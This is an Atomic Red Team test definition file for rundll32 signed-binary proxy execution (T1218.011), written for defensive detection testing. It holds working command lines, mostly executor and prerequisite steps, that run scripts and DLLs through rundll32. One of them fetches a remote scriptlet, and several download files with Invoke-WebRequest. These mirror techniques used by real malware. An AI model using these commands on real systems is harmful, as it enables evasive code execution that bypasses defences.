atomic-red-team-gs/atomics/T1218.011/T1218.011.yaml

attack_technique: T1218.011
display_name: 'Signed Binary Proxy Execution: Rundll32'
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
  auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
  description: |
    Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. 
    This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/)

    Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed. 
  supported_platforms:
  - windows
  input_arguments:
    file_url:
      description: location of the payload
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
  executor:
    command: |
      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();window.close();
    cleanup_command: |
      taskkill /IM notepad.exe /f
    name: command_prompt
- name: Rundll32 execute VBscript command
  auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
  description: |
    Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
    Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
    Upon execution calc.exe will be launched
  supported_platforms:
  - windows
  input_arguments:
    command_to_execute:
      description: Command for rundll32.exe to execute
      type: string
      default: calc.exe
  executor:
    command: |
      rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
    name: command_prompt
- name: Rundll32 execute VBscript command using Ordinal number
  auto_generated_guid: 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821
  description: |
    Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
    Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
    Upon execution calc.exe will be launched
  supported_platforms:
  - windows
  input_arguments:
    command_to_execute:
      description: Command for rundll32.exe to execute
      type: string
      default: calc.exe
  executor:
    command: |
      rundll32 vbscript:"\..\mshtml,#135 "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
    name: command_prompt
- name: Rundll32 advpack.dll Execution
  auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89
  description: |
    Test execution of a command using rundll32.exe with advpack.dll.
    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
    Upon execution calc.exe will be launched
  supported_platforms:
  - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Inf file must exist on disk at specified location ("#{inf_to_execute}")
    prereq_command: |
      if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
  executor:
    command: |
      rundll32.exe advpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
    name: command_prompt
- name: Rundll32 ieadvpack.dll Execution
  auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9
  description: |
    Test execution of a command using rundll32.exe with ieadvpack.dll.
    Upon execution calc.exe will be launched

    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
  supported_platforms:
  - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1218.011\src\T1218.011.inf
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Inf file must exist on disk at specified location ("#{inf_to_execute}")
    prereq_command: |
      if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}"
  executor:
    command: |
      rundll32.exe ieadvpack.dll,LaunchINFSection "#{inf_to_execute}",DefaultInstall_SingleUser,1,
    name: command_prompt
- name: Rundll32 syssetup.dll Execution
  auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125
  description: |
    Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened

    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
  supported_platforms:
  - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Inf file must exist on disk at specified location ("#{inf_to_execute}")
    prereq_command: |
      if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
  executor:
    command: |
      rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 "#{inf_to_execute}"
    name: command_prompt
- name: Rundll32 setupapi.dll Execution
  auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19
  description: |
    Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened

    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
  supported_platforms:
  - windows
  input_arguments:
    inf_to_execute:
      description: Local location of inf file
      type: string
      default: PathToAtomicsFolder\T1218.011\src\T1218.011_DefaultInstall.inf
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Inf file must exist on disk at specified location ("#{inf_to_execute}")
    prereq_command: |
      if (Test-Path "#{inf_to_execute}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{inf_to_execute}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}"
  executor:
    command: |
      rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 "#{inf_to_execute}"
    name: command_prompt
- name: Execution of HTA and VBS Files using Rundll32 and URL.dll
  auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3
  description: |
    IcedID uses this TTP as follows:
      rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta
    Trickbot uses this TTP as follows:
      rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs

    In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript"
  supported_platforms:
  - windows
  executor:
    command: |
      rundll32.exe url.dll,OpenURL "PathToAtomicsFolder\T1218.011\src\index.hta"
      rundll32.exe URL.dll,FileProtocolHandler "PathToAtomicsFolder\T1218.011\src\akteullen.vbs"
    name: command_prompt
- name: Launches an executable using Rundll32 and pcwutl.dll
  auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676
  description: |
    Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable.
  supported_platforms:
  - windows
  input_arguments:
    exe_to_launch:
      description: Path of the executable to launch
      type: path
      default: '%windir%\System32\notepad.exe'
  executor:
    command: |
      rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
    name: command_prompt
- name: Execution of non-dll using rundll32.exe
  auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac
  description: |
    Rundll32.exe running non-dll 
  supported_platforms:
  - windows
  input_arguments:
    input_url:
      description: Url to download the DLL
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
    input_file:
      description: Non-dll file
      type: string
      default: C:\Users\$env:username\Downloads\calc.png
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Non-dll file must exist on disk at specified location
    prereq_command: |
      if (Test-Path #{input_file}) {exit 0} else {exit 1}
    get_prereq_command: |
      Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
  executor:
    name: powershell
    command: |
      rundll32.exe #{input_file}, StartW
- name: Rundll32 with Ordinal Value
  auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
  description: |
    Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. 
    Upon successful execution, Calc.exe will spawn.
  supported_platforms:
  - windows
  input_arguments:
    input_url:
      description: Url to download the DLL
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll
    input_file:
      description: DLL File
      type: string
      default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
  dependency_executor_name: powershell
  dependencies:
  - description: |
      DLL file must exist on disk at specified location
    prereq_command: |
      if (Test-Path "#{input_file}") {exit 0} else {exit 1}
    get_prereq_command: |
      Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
  executor:
    name: command_prompt
    command: |
      rundll32.exe "#{input_file}",#2
- name: Rundll32 with Control_RunDLL
  auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
  description: |
    Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. 
  supported_platforms:
  - windows
  input_arguments:
    input_url:
      description: Url to download the DLL
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
    input_file:
      description: DLL File
      type: string
      default: PathToAtomicsFolder\T1047\bin\calc.dll
  dependency_executor_name: powershell
  dependencies:
  - description: |
      DLL file must exist on disk at specified location
    prereq_command: |
      if (Test-Path "#{input_file}") {exit 0} else {exit 1}
    get_prereq_command: |
      Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
  executor:
    name: command_prompt
    command: |
      rundll32.exe shell32.dll,Control_RunDLL "#{input_file}"
- name: Rundll32 with desk.cpl
  auto_generated_guid: 83a95136-a496-423c-81d3-1c6750133917
  description: |
    Rundll32.exe loading an executable renamed as .scr using desk.cpl 
    Reference: 
      - [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)
    SIGMA rules:
      - [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml)
      - [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
  supported_platforms:
  - windows
  input_arguments:
    exe_to_launch:
      description: Path of the executable to launch
      type: path
      default: '%windir%\System32\calc.exe'
  executor:
    name: command_prompt
    command: |
      copy #{exe_to_launch} not_an_scr.scr
      rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
    cleanup_command: del not_an_scr.scr

- name: Running DLL with .init extension and function
  auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
  description: |
    This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
    DLL created with the AtomicTestHarnesses Portable Executable Builder script.
  supported_platforms:
  - windows
  input_arguments:
    dll_file:
      description: The DLL file to be called
      type: string
      default: PathToAtomicsFolder\T1218.011\bin\_WT.init
    dll_url:
      description: The URL to the DLL file that must be downloaded
      type: url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
  dependency_executor_name: powershell
  dependencies:
  - description: The DLL file to be called must exist at the specified location (#{dll_file})
    prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
      Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
  executor:
    command: |
      rundll32.exe #{dll_file},krnl
    name: command_prompt
- name: Rundll32 execute command via FileProtocolHandler
  auto_generated_guid: f3ad3c5b-1db1-45c1-81bf-d3370ebab6c8
  description: |
    Test execution of a command using rundll32.exe and the FileProtocolHandler technique.
    Upon execution, calc.exe will be launched.
    This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7
  supported_platforms:
  - windows
  input_arguments:
    command_to_execute:
      description: Command for rundll32.exe to execute
      type: string
      default: calc.exe
  executor:
    command: |
      rundll32.exe url.dll,FileProtocolHandler #{command_to_execute}
    name: command_prompt
- name: Rundll32 execute payload by calling RouteTheCall
  auto_generated_guid: 8a7f56ee-10e7-444c-a139-0109438288eb
  description: |
    Launch an executable payload by calling RouteTheCall. Test execution of a command using rundll32.exe to execute a payload{calc.exe} by calling RouteTheCall. Upon execution, calc.exe will be launched.
    Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Zipfldr.yml
  supported_platforms:
  - windows
  input_arguments:
    exe_to_launch:
      description: Path of the executable to launch
      type: path
      default: "'%windir%\\System32\\calc.exe'"
  executor:
    command: rundll32.exe zipfldr.dll,RouteTheCall "#{exe_to_launch}"
    cleanup_command: 
    name: powershell
    elevation_required: false